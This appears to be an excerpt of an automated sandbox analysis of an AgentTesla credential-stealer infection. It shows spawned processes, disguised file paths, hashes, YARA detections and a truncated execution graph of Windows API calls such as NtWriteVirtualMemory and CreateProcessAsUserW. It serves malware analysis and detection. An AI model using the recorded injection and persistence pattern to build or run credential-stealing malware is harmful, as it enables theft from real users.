                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:false

                                                                                                                              Target ID:29
                                                                                                                              Start time:12:02:46
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                              Imagebase:0xd0000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:30
                                                                                                                              Start time:12:02:52
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:1'056'768 bytes
                                                                                                                              MD5 hash:BDC3B662D1136F20F51F55A0F6A2FB9D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:Borland Delphi
                                                                                                                              Has exited:true

                                                                                                                              Target ID:31
                                                                                                                              Start time:12:02:53
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:68'096 bytes
                                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:32
                                                                                                                              Start time:12:02:54
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:250'368 bytes
                                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.2692159904.000000000307C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.2692159904.0000000003084000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:false

                                                                                                                              Target ID:33
                                                                                                                              Start time:12:02:54
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                              Imagebase:0x1f0000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:34
                                                                                                                              Start time:12:03:00
                                                                                                                              Start date:11/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                              Imagebase:0xbb0000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:14.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:30.1%
                                                                                                                                Total number of Nodes:1649
                                                                                                                                Total number of Limit Nodes:19
                                                                                                                                execution_graph 32350 2a23e12 33906 2a04860 32350->33906 33907 2a04871 33906->33907 33908 2a04897 33907->33908 33909 2a048ae 33907->33909 33915 2a04bcc 33908->33915 33924 2a045a0 33909->33924 33912 2a048a4 33913 2a048df 33912->33913 33929 2a04530 33912->33929 33918 2a04bd9 33915->33918 33922 2a04c09 33915->33922 33917 2a04c02 33919 2a045a0 11 API calls 33917->33919 33918->33917 33921 2a04be5 33918->33921 33919->33922 33920 2a04bf3 33920->33912 33935 2a02c44 11 API calls 33921->33935 33936 2a044dc 33922->33936 33925 2a045a4 33924->33925 33926 2a045c8 33924->33926 33949 2a02c10 33925->33949 33926->33912 33928 2a045b1 33928->33912 33931 2a04544 33929->33931 33932 2a04534 33929->33932 33930 2a04572 33930->33913 33931->33930 33934 2a02c2c 11 API calls 33931->33934 33932->33931 33933 2a045a0 11 API calls 33932->33933 33933->33931 33934->33930 33935->33920 33937 2a044e2 33936->33937 33938 2a044fd 33936->33938 33937->33938 33940 2a02c2c 33937->33940 33938->33920 33941 2a02c3a 33940->33941 33943 2a02c30 33940->33943 33941->33938 33942 2a02d19 33948 2a02ce8 7 API calls 33942->33948 33943->33941 33943->33942 33947 2a06520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33943->33947 33946 2a02d3a 33946->33938 33947->33942 33948->33946 33950 2a02c27 33949->33950 33953 2a02c14 33949->33953 33950->33928 33951 2a02c1e 33951->33928 33952 2a02d19 33958 2a02ce8 7 API calls 33952->33958 33953->33951 33953->33952 33957 2a06520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33953->33957 33956 2a02d3a 33956->33928 33957->33952 33958->33956 33959 2a2c350 33962 2a1f7c8 33959->33962 33963 2a1f7d0 33962->33963 33963->33963 33964 2a1f7d7 33963->33964 36397 2a188b8 LoadLibraryW 33964->36397 33966 2a1f7f1 36402 2a02ee0 QueryPerformanceCounter 33966->36402 33968 2a1f7f6 33969 2a1f800 InetIsOffline 33968->33969 33970 2a1f81b 33969->33970 33971 2a1f80a 33969->33971 33973 2a04530 11 API calls 33970->33973 33972 2a04530 11 API calls 33971->33972 33974 2a1f819 33972->33974 33973->33974 33975 2a04860 11 API calls 33974->33975 33976 2a1f848 33975->33976 33977 2a1f850 33976->33977 33978 2a1f85a 33977->33978 36405 2a047ec 33978->36405 33980 2a1f873 33981 2a1f87b 33980->33981 33982 2a1f885 33981->33982 36420 2a189d0 33982->36420 33985 2a04860 11 API calls 33986 2a1f8ac 33985->33986 33987 2a1f8b4 33986->33987 33988 2a1f8be 33987->33988 33989 2a047ec 11 API calls 33988->33989 33990 2a1f8d7 33989->33990 33991 2a1f8df 33990->33991 33992 2a1f8e9 33991->33992 33993 2a189d0 20 API calls 33992->33993 33994 2a1f8f2 33993->33994 33995 2a04860 11 API calls 33994->33995 33996 2a1f910 33995->33996 33997 2a1f918 33996->33997 36433 2a046d4 33997->36433 36435 2a18274 36397->36435 36399 2a188f1 36446 2a17d78 36399->36446 36403 2a02ef8 GetTickCount 36402->36403 36404 2a02eed 36402->36404 36403->33968 36404->33968 36406 2a047f0 36405->36406 36407 2a04851 36405->36407 36408 2a04530 36406->36408 36409 2a047f8 36406->36409 36414 2a045a0 11 API calls 36408->36414 36416 2a04544 36408->36416 36409->36407 36411 2a04807 36409->36411 36413 2a04530 11 API calls 36409->36413 36410 2a04572 36410->33980 36412 2a045a0 11 API calls 36411->36412 36415 2a04821 36412->36415 36413->36411 36414->36416 36418 2a04530 11 API calls 36415->36418 36416->36410 36417 2a02c2c 11 API calls 36416->36417 36417->36410 36419 2a0484d 36418->36419 36419->33980 36421 2a189e4 36420->36421 36422 2a181cc 17 API calls 36421->36422 36423 2a18a1d 36422->36423 36424 2a18274 15 API calls 36423->36424 36425 2a18a36 36424->36425 36426 2a17d78 18 API calls 36425->36426 36427 2a18a95 36426->36427 36482 2a18338 36427->36482 36430 2a18abc 36431 2a04500 11 API calls 36430->36431 36432 2a18ac9 36431->36432 36432->33985 36434 2a046da 36433->36434 36436 2a04530 11 API calls 36435->36436 36437 2a18299 36436->36437 36460 2a1798c 36437->36460 36440 2a047ec 11 API calls 36441 2a182b3 36440->36441 36442 2a182bb GetModuleHandleW GetProcAddress GetProcAddress 36441->36442 36443 2a182ee 36442->36443 36466 2a04500 36443->36466 36447 2a04530 11 API calls 36446->36447 36448 2a17d9d 36447->36448 36449 2a1798c 12 API calls 36448->36449 36450 2a17daa 36449->36450 36451 2a047ec 11 API calls 36450->36451 36452 2a17dba 36451->36452 36471 2a181cc 36452->36471 36455 2a18274 15 API calls 36456 2a17dd3 NtWriteVirtualMemory 36455->36456 36457 2a17dff 36456->36457 36458 2a04500 11 API calls 36457->36458 36459 2a17e0c FreeLibrary 36458->36459 36459->33966 36461 2a1799d 36460->36461 36462 2a04bcc 11 API calls 36461->36462 36464 2a179ad 36462->36464 36463 2a17a19 36463->36440 36464->36463 36470 2a0babc CharNextA 36464->36470 36467 2a04506 36466->36467 36468 2a0452c 36467->36468 36469 2a02c2c 11 API calls 36467->36469 36468->36399 36469->36467 36470->36464 36472 2a04530 11 API calls 36471->36472 36473 2a181ef 36472->36473 36474 2a1798c 12 API calls 36473->36474 36475 2a181fc 36474->36475 36476 2a18204 GetModuleHandleA 36475->36476 36477 2a18274 15 API calls 36476->36477 36478 2a18215 GetModuleHandleA 36477->36478 36479 2a18233 36478->36479 36480 2a044dc 11 API calls 36479->36480 36481 2a17dcd 36480->36481 36481->36455 36483 2a04530 11 API calls 36482->36483 36484 2a1835b 36483->36484 36485 2a04860 11 API calls 36484->36485 36486 2a1837a 36485->36486 36487 2a181cc 17 API calls 36486->36487 36488 2a1838d 36487->36488 36489 2a18274 15 API calls 36488->36489 36490 2a18393 FlushInstructionCache 36489->36490 36491 2a183b9 36490->36491 36492 2a044dc 11 API calls 36491->36492 36493 2a183c1 FreeLibrary 36492->36493 36493->36430 36494 2a27074 36495 2a04860 11 API calls 36494->36495 36496 2a27095 36495->36496 36497 2a047ec 11 API calls 36496->36497 36498 2a270cc 36497->36498 36499 2a189d0 20 API calls 36498->36499 36500 2a270f0 36499->36500 36501 2a04860 11 API calls 36500->36501 36502 2a27111 36501->36502 36503 2a047ec 11 API calls 36502->36503 36504 2a27148 36503->36504 36505 2a189d0 20 API calls 36504->36505 36506 2a2716c 36505->36506 36507 2a04860 11 API calls 36506->36507 36508 2a2718d 36507->36508 36509 2a047ec 11 API calls 36508->36509 36510 2a271c4 36509->36510 36511 2a189d0 20 API calls 36510->36511 36512 2a271e8 36511->36512 36513 2a04860 11 API calls 36512->36513 36514 2a27209 36513->36514 36515 2a047ec 11 API calls 36514->36515 36516 2a27240 36515->36516 36517 2a189d0 20 API calls 36516->36517 36518 2a27264 36517->36518 36519 2a04860 11 API calls 36518->36519 36520 2a27285 36519->36520 36521 2a047ec 11 API calls 36520->36521 36522 2a272bc 36521->36522 36523 2a189d0 20 API calls 36522->36523 36524 2a272e0 36523->36524 36525 2a04860 11 API calls 36524->36525 36526 2a2731a 36525->36526 37315 2a1e0f8 36526->37315 36528 2a27349 37325 2a1f214 36528->37325 36531 2a04860 11 API calls 36532 2a27399 36531->36532 36533 2a047ec 11 API calls 36532->36533 36534 2a273d0 36533->36534 36535 2a189d0 20 API calls 36534->36535 36536 2a273f4 36535->36536 36537 2a04860 11 API calls 36536->36537 36538 2a27415 36537->36538 36539 2a047ec 11 API calls 36538->36539 36540 2a2744c 36539->36540 36541 2a189d0 20 API calls 36540->36541 36542 2a27470 36541->36542 36543 2a04860 11 API calls 36542->36543 36544 2a27491 36543->36544 36545 2a047ec 11 API calls 36544->36545 36546 2a274c8 36545->36546 36547 2a189d0 20 API calls 36546->36547 36548 2a274ec 36547->36548 36549 2a04860 11 API calls 36548->36549 36550 2a2750d 36549->36550 36551 2a047ec 11 API calls 36550->36551 36552 2a27544 36551->36552 36553 2a189d0 20 API calls 36552->36553 36554 2a27568 36553->36554 36555 2a04860 11 API calls 36554->36555 36556 2a27589 36555->36556 36557 2a047ec 11 API calls 36556->36557 36558 2a275c0 36557->36558 36559 2a189d0 20 API calls 36558->36559 36560 2a275e4 36559->36560 36561 2a04860 11 API calls 36560->36561 36562 2a27605 36561->36562 36563 2a047ec 11 API calls 36562->36563 36564 2a2763c 36563->36564 36565 2a189d0 20 API calls 36564->36565 36566 2a27660 36565->36566 36567 2a04860 11 API calls 36566->36567 36568 2a27681 36567->36568 36569 2a047ec 11 API calls 36568->36569 36570 2a276b8 36569->36570 36571 2a189d0 20 API calls 36570->36571 36572 2a276dc 36571->36572 36573 2a04860 11 API calls 36572->36573 36574 2a276fd 36573->36574 36575 2a047ec 11 API calls 36574->36575 36576 2a27734 36575->36576 36577 2a189d0 20 API calls 36576->36577 36578 2a27758 36577->36578 36579 2a04860 11 API calls 36578->36579 36580 2a27779 36579->36580 36581 2a047ec 11 API calls 36580->36581 36582 2a277b0 36581->36582 36583 2a189d0 20 API calls 36582->36583 36584 2a277d4 36583->36584 36585 2a28318 36584->36585 36586 2a277e9 36584->36586 36587 2a04860 11 API calls 36585->36587 36588 2a04860 11 API calls 36586->36588 36590 2a28339 36587->36590 36589 2a2780a 36588->36589 36591 2a047ec 11 API calls 36589->36591 36592 2a047ec 11 API calls 36590->36592 36593 2a27841 36591->36593 36594 2a28370 36592->36594 36595 2a189d0 20 API calls 36593->36595 36596 2a189d0 20 API calls 36594->36596 36597 2a27865 36595->36597 36598 2a28394 36596->36598 36600 2a04860 11 API calls 36597->36600 36599 2a04860 11 API calls 36598->36599 36602 2a283b5 36599->36602 36601 2a27886 36600->36601 36603 2a047ec 11 API calls 36601->36603 36604 2a047ec 11 API calls 36602->36604 36605 2a278bd 36603->36605 36606 2a283ec 36604->36606 36607 2a189d0 20 API calls 36605->36607 36608 2a189d0 20 API calls 36606->36608 36609 2a278e1 36607->36609 36610 2a28410 36608->36610 36611 2a04860 11 API calls 36609->36611 36612 2a04860 11 API calls 36610->36612 36614 2a27902 36611->36614 36613 2a28431 36612->36613 36616 2a047ec 11 API calls 36613->36616 36615 2a047ec 11 API calls 36614->36615 36617 2a27939 36615->36617 36618 2a28468 36616->36618 36619 2a189d0 20 API calls 36617->36619 36620 2a189d0 20 API calls 36618->36620 36621 2a2795d 36619->36621 36622 2a2848c 36620->36622 36623 2a047ec 11 API calls 36621->36623 36624 2a04860 11 API calls 36622->36624 36625 2a27975 36623->36625 36626 2a284ad 36624->36626 37775 2a185bc 36625->37775 36629 2a047ec 11 API calls 36626->36629 36632 2a284e4 36629->36632 36630 2a04860 11 API calls 36631 2a279a7 36630->36631 36633 2a047ec 11 API calls 36631->36633 36634 2a189d0 20 API calls 36632->36634 36636 2a279de 36633->36636 36635 2a28508 36634->36635 36637 2a293a1 36635->36637 36638 2a2851d 36635->36638 36641 2a189d0 20 API calls 36636->36641 36639 2a04860 11 API calls 36637->36639 36640 2a04860 11 API calls 36638->36640 36646 2a293c2 36639->36646 36642 2a2853e 36640->36642 36643 2a27a02 36641->36643 36645 2a28556 36642->36645 36644 2a04860 11 API calls 36643->36644 36649 2a27a23 36644->36649 36647 2a047ec 11 API calls 36645->36647 36648 2a047ec 11 API calls 36646->36648 36650 2a28575 36647->36650 36652 2a293f9 36648->36652 36651 2a047ec 11 API calls 36649->36651 36653 2a2858d 36650->36653 36656 2a27a5a 36651->36656 36654 2a189d0 20 API calls 36652->36654 36655 2a189d0 20 API calls 36653->36655 36657 2a2941d 36654->36657 36658 2a28599 36655->36658 36661 2a189d0 20 API calls 36656->36661 36659 2a04860 11 API calls 36657->36659 36660 2a04860 11 API calls 36658->36660 36665 2a2943e 36659->36665 36662 2a285ba 36660->36662 36663 2a27a7e 36661->36663 36666 2a285c5 36662->36666 36664 2a04860 11 API calls 36663->36664 36670 2a27a9f 36664->36670 36668 2a047ec 11 API calls 36665->36668 36667 2a047ec 11 API calls 36666->36667 36669 2a285f1 36667->36669 36672 2a29475 36668->36672 36673 2a285fc 36669->36673 36671 2a047ec 11 API calls 36670->36671 36676 2a27ad6 36671->36676 36674 2a189d0 20 API calls 36672->36674 36675 2a189d0 20 API calls 36673->36675 36677 2a29499 36674->36677 36678 2a28615 36675->36678 36681 2a189d0 20 API calls 36676->36681 36679 2a04860 11 API calls 36677->36679 36680 2a04860 11 API calls 36678->36680 36682 2a294ba 36679->36682 36683 2a28636 36680->36683 36684 2a27afa 36681->36684 36685 2a047ec 11 API calls 36682->36685 36686 2a047ec 11 API calls 36683->36686 37787 2a1adf8 29 API calls 36684->37787 36691 2a294f1 36685->36691 36690 2a2866d 36686->36690 36688 2a27b21 36689 2a04860 11 API calls 36688->36689 36694 2a27b42 36689->36694 36693 2a189d0 20 API calls 36690->36693 36692 2a189d0 20 API calls 36691->36692 36703 2a29515 36692->36703 36695 2a28691 36693->36695 36697 2a047ec 11 API calls 36694->36697 36696 2a047ec 11 API calls 36695->36696 36698 2a286bd 36696->36698 36702 2a27b79 36697->36702 36701 2a286d5 36698->36701 36699 2a29cf5 36700 2a04860 11 API calls 36699->36700 36706 2a29d16 36700->36706 36707 2a286e0 CreateProcessAsUserW 36701->36707 36705 2a189d0 20 API calls 36702->36705 36703->36699 36704 2a04860 11 API calls 36703->36704 36716 2a29560 36704->36716 36708 2a27b9d 36705->36708 36713 2a047ec 11 API calls 36706->36713 36709 2a286f2 36707->36709 36710 2a2876e 36707->36710 36712 2a04860 11 API calls 36708->36712 36711 2a04860 11 API calls 36709->36711 36714 2a04860 11 API calls 36710->36714 36715 2a28713 36711->36715 36719 2a27bbe 36712->36719 36720 2a29d4d 36713->36720 36721 2a2878f 36714->36721 36717 2a2871e 36715->36717 36718 2a047ec 11 API calls 36716->36718 36725 2a047ec 11 API calls 36717->36725 36726 2a29597 36718->36726 36722 2a047ec 11 API calls 36719->36722 36723 2a189d0 20 API calls 36720->36723 36724 2a047ec 11 API calls 36721->36724 36732 2a27bf5 36722->36732 36727 2a29d71 36723->36727 36734 2a287c6 36724->36734 36728 2a2874a 36725->36728 36730 2a189d0 20 API calls 36726->36730 36729 2a04860 11 API calls 36727->36729 36731 2a28755 36728->36731 36737 2a29d92 36729->36737 36733 2a295bb 36730->36733 36739 2a189d0 20 API calls 36731->36739 36736 2a189d0 20 API calls 36732->36736 36735 2a04860 11 API calls 36733->36735 36738 2a189d0 20 API calls 36734->36738 36745 2a295dc 36735->36745 36740 2a27c19 36736->36740 36743 2a047ec 11 API calls 36737->36743 36741 2a287ea 36738->36741 36739->36710 36742 2a04860 11 API calls 36740->36742 36744 2a04860 11 API calls 36741->36744 36749 2a27c3a 36742->36749 36747 2a29dc9 36743->36747 36748 2a2880b 36744->36748 36746 2a047ec 11 API calls 36745->36746 36753 2a29613 36746->36753 36751 2a189d0 20 API calls 36747->36751 36752 2a047ec 11 API calls 36748->36752 36750 2a047ec 11 API calls 36749->36750 36757 2a27c71 36750->36757 36754 2a29ded 36751->36754 36759 2a28842 36752->36759 36756 2a189d0 20 API calls 36753->36756 36755 2a04860 11 API calls 36754->36755 36763 2a29e0e 36755->36763 36758 2a29637 36756->36758 36761 2a189d0 20 API calls 36757->36761 36760 2a04860 11 API calls 36758->36760 36764 2a189d0 20 API calls 36759->36764 36762 2a29658 36760->36762 36767 2a27c95 36761->36767 36771 2a047ec 11 API calls 36762->36771 36765 2a047ec 11 API calls 36763->36765 36766 2a28866 36764->36766 36772 2a29e45 36765->36772 36768 2a049f8 11 API calls 36766->36768 36769 2a04860 11 API calls 36767->36769 36770 2a2888a 36768->36770 36776 2a27cd5 36769->36776 36773 2a04860 11 API calls 36770->36773 36777 2a2968f 36771->36777 36774 2a189d0 20 API calls 36772->36774 36775 2a288b9 36773->36775 36781 2a29e69 36774->36781 36782 2a288c4 36775->36782 36778 2a047ec 11 API calls 36776->36778 36779 2a189d0 20 API calls 36777->36779 36785 2a27d0c 36778->36785 36780 2a296b3 36779->36780 37337 2a1f094 36780->37337 36787 2a189d0 20 API calls 36781->36787 36784 2a047ec 11 API calls 36782->36784 36788 2a288f0 36784->36788 36790 2a189d0 20 API calls 36785->36790 36793 2a29e9c 36787->36793 36794 2a288fb 36788->36794 36789 2a04860 11 API calls 36795 2a296f7 36789->36795 36791 2a27d30 36790->36791 36792 2a04860 11 API calls 36791->36792 36801 2a27d51 36792->36801 36797 2a189d0 20 API calls 36793->36797 36796 2a189d0 20 API calls 36794->36796 36799 2a04860 11 API calls 36795->36799 36798 2a28914 36796->36798 36802 2a29ecf 36797->36802 36800 2a04860 11 API calls 36798->36800 36805 2a2972f 36799->36805 36804 2a28935 36800->36804 36803 2a047ec 11 API calls 36801->36803 36806 2a189d0 20 API calls 36802->36806 36809 2a27d88 36803->36809 36808 2a047ec 11 API calls 36804->36808 36807 2a047ec 11 API calls 36805->36807 36811 2a29f02 36806->36811 36813 2a29766 36807->36813 36814 2a2896c 36808->36814 36810 2a189d0 20 API calls 36809->36810 36812 2a27dac 36810->36812 36816 2a189d0 20 API calls 36811->36816 36815 2a04860 11 API calls 36812->36815 36817 2a189d0 20 API calls 36813->36817 36819 2a189d0 20 API calls 36814->36819 36825 2a27dcd 36815->36825 36818 2a29f35 36816->36818 36820 2a2978a 36817->36820 36821 2a04860 11 API calls 36818->36821 36822 2a28990 36819->36822 36823 2a04860 11 API calls 36820->36823 36827 2a29f56 36821->36827 36824 2a04860 11 API calls 36822->36824 36829 2a297ab 36823->36829 36828 2a289b1 36824->36828 36826 2a047ec 11 API calls 36825->36826 36833 2a27e04 36826->36833 36830 2a047ec 11 API calls 36827->36830 36831 2a047ec 11 API calls 36828->36831 36832 2a047ec 11 API calls 36829->36832 36835 2a29f8d 36830->36835 36838 2a289e8 36831->36838 36837 2a297e2 36832->36837 36834 2a189d0 20 API calls 36833->36834 36836 2a27e28 36834->36836 36840 2a189d0 20 API calls 36835->36840 37788 2a15aec 42 API calls 36836->37788 36841 2a189d0 20 API calls 36837->36841 36844 2a189d0 20 API calls 36838->36844 36843 2a29fb1 36840->36843 36845 2a29806 36841->36845 36847 2a04860 11 API calls 36843->36847 36848 2a28a0c 36844->36848 37344 2a07e5c 36845->37344 36846 2a27e54 36854 2a04bcc 11 API calls 36846->36854 36859 2a29fd2 36847->36859 37791 2a1d164 23 API calls 36848->37791 36852 2a28a20 36855 2a04860 11 API calls 36852->36855 36853 2a29aef 36858 2a04860 11 API calls 36853->36858 36857 2a27e69 36854->36857 36862 2a28a46 36855->36862 36856 2a04860 11 API calls 36864 2a29839 36856->36864 36860 2a04860 11 API calls 36857->36860 36863 2a29b10 36858->36863 36861 2a047ec 11 API calls 36859->36861 36865 2a27e8a 36860->36865 36869 2a2a009 36861->36869 36866 2a047ec 11 API calls 36862->36866 36868 2a047ec 11 API calls 36863->36868 36867 2a047ec 11 API calls 36864->36867 36870 2a047ec 11 API calls 36865->36870 36873 2a28a7d 36866->36873 36874 2a29870 36867->36874 36875 2a29b47 36868->36875 36871 2a189d0 20 API calls 36869->36871 36877 2a27ec1 36870->36877 36872 2a2a02d 36871->36872 36876 2a04860 11 API calls 36872->36876 36878 2a189d0 20 API calls 36873->36878 36879 2a189d0 20 API calls 36874->36879 36880 2a189d0 20 API calls 36875->36880 36889 2a2a04e 36876->36889 36883 2a189d0 20 API calls 36877->36883 36881 2a28aa1 36878->36881 36882 2a29894 36879->36882 36884 2a29b6b 36880->36884 36885 2a04860 11 API calls 36881->36885 36886 2a04860 11 API calls 36882->36886 36887 2a27ee5 36883->36887 36888 2a04860 11 API calls 36884->36888 36892 2a28ac2 36885->36892 36893 2a298b5 36886->36893 36891 2a049f8 11 API calls 36887->36891 36895 2a29b8c 36888->36895 36890 2a047ec 11 API calls 36889->36890 36899 2a2a085 36890->36899 36894 2a27f02 36891->36894 36896 2a047ec 11 API calls 36892->36896 36900 2a047ec 11 API calls 36893->36900 37789 2a17e50 17 API calls 36894->37789 36898 2a047ec 11 API calls 36895->36898 36904 2a28af9 36896->36904 36906 2a29bc3 36898->36906 36903 2a189d0 20 API calls 36899->36903 36905 2a298ec 36900->36905 36901 2a27f08 36902 2a04860 11 API calls 36901->36902 36907 2a27f29 36902->36907 36911 2a2a0a9 36903->36911 36908 2a189d0 20 API calls 36904->36908 36909 2a189d0 20 API calls 36905->36909 36910 2a189d0 20 API calls 36906->36910 36914 2a047ec 11 API calls 36907->36914 36912 2a28b1d 36908->36912 36913 2a29910 36909->36913 36915 2a29be7 36910->36915 36919 2a189d0 20 API calls 36911->36919 36916 2a04860 11 API calls 36912->36916 36917 2a04860 11 API calls 36913->36917 36920 2a27f60 36914->36920 36918 2a04860 11 API calls 36915->36918 36921 2a28b3e 36916->36921 36922 2a29931 36917->36922 36923 2a29c08 36918->36923 36924 2a2a0dc 36919->36924 36925 2a189d0 20 API calls 36920->36925 36926 2a047ec 11 API calls 36921->36926 36927 2a047ec 11 API calls 36922->36927 36929 2a047ec 11 API calls 36923->36929 36930 2a189d0 20 API calls 36924->36930 36928 2a27f84 36925->36928 36932 2a28b75 36926->36932 36933 2a29968 36927->36933 36931 2a04860 11 API calls 36928->36931 36934 2a29c3f 36929->36934 36935 2a2a10f 36930->36935 36936 2a27fa5 36931->36936 36937 2a189d0 20 API calls 36932->36937 36938 2a189d0 20 API calls 36933->36938 36939 2a189d0 20 API calls 36934->36939 36940 2a189d0 20 API calls 36935->36940 36943 2a047ec 11 API calls 36936->36943 36941 2a28b99 36937->36941 36942 2a2998c 36938->36942 36944 2a29c63 36939->36944 36953 2a2a142 36940->36953 36945 2a28ba2 36941->36945 36946 2a28bb9 36941->36946 37348 2a1e358 36942->37348 36955 2a27fdc 36943->36955 36948 2a04860 11 API calls 36944->36948 37792 2a18730 17 API calls 36945->37792 36950 2a04860 11 API calls 36946->36950 36957 2a29c84 36948->36957 36959 2a28bda 36950->36959 36952 2a04530 11 API calls 36954 2a299b1 36952->36954 36958 2a189d0 20 API calls 36953->36958 36956 2a04860 11 API calls 36954->36956 36960 2a189d0 20 API calls 36955->36960 36965 2a299d2 36956->36965 36962 2a047ec 11 API calls 36957->36962 36966 2a2a175 36958->36966 36963 2a047ec 11 API calls 36959->36963 36961 2a28000 36960->36961 36964 2a04860 11 API calls 36961->36964 36967 2a29cbb 36962->36967 36969 2a28c11 36963->36969 36971 2a28021 36964->36971 36970 2a047ec 11 API calls 36965->36970 36968 2a189d0 20 API calls 36966->36968 36973 2a189d0 20 API calls 36967->36973 36972 2a2a1a8 36968->36972 36975 2a189d0 20 API calls 36969->36975 36979 2a29a09 36970->36979 36976 2a047ec 11 API calls 36971->36976 36974 2a04860 11 API calls 36972->36974 36977 2a29cdf 36973->36977 36985 2a2a1c9 36974->36985 36978 2a28c35 36975->36978 36987 2a28058 36976->36987 37368 2a049f8 36977->37368 36981 2a04860 11 API calls 36978->36981 36983 2a189d0 20 API calls 36979->36983 36990 2a28c56 36981->36990 36986 2a29a2d 36983->36986 36989 2a047ec 11 API calls 36985->36989 36988 2a04860 11 API calls 36986->36988 36991 2a189d0 20 API calls 36987->36991 36995 2a29a4e 36988->36995 36996 2a2a200 36989->36996 36993 2a047ec 11 API calls 36990->36993 36992 2a2807c 36991->36992 36994 2a04860 11 API calls 36992->36994 36997 2a28c8d 36993->36997 37000 2a2809d 36994->37000 36998 2a047ec 11 API calls 36995->36998 36999 2a189d0 20 API calls 36996->36999 37003 2a189d0 20 API calls 36997->37003 37006 2a29a85 36998->37006 37001 2a2a224 36999->37001 37004 2a047ec 11 API calls 37000->37004 37002 2a04860 11 API calls 37001->37002 37009 2a2a245 37002->37009 37005 2a28cb1 37003->37005 37010 2a280d4 37004->37010 37007 2a04860 11 API calls 37005->37007 37008 2a189d0 20 API calls 37006->37008 37012 2a28cd2 37007->37012 37018 2a29aa9 37008->37018 37011 2a047ec 11 API calls 37009->37011 37013 2a189d0 20 API calls 37010->37013 37017 2a2a27c 37011->37017 37015 2a047ec 11 API calls 37012->37015 37014 2a280f8 37013->37014 37790 2a1b118 39 API calls 37014->37790 37021 2a28d09 37015->37021 37020 2a189d0 20 API calls 37017->37020 37353 2a1dc8c 37018->37353 37025 2a2a2a0 37020->37025 37023 2a189d0 20 API calls 37021->37023 37022 2a28109 37024 2a28d2d 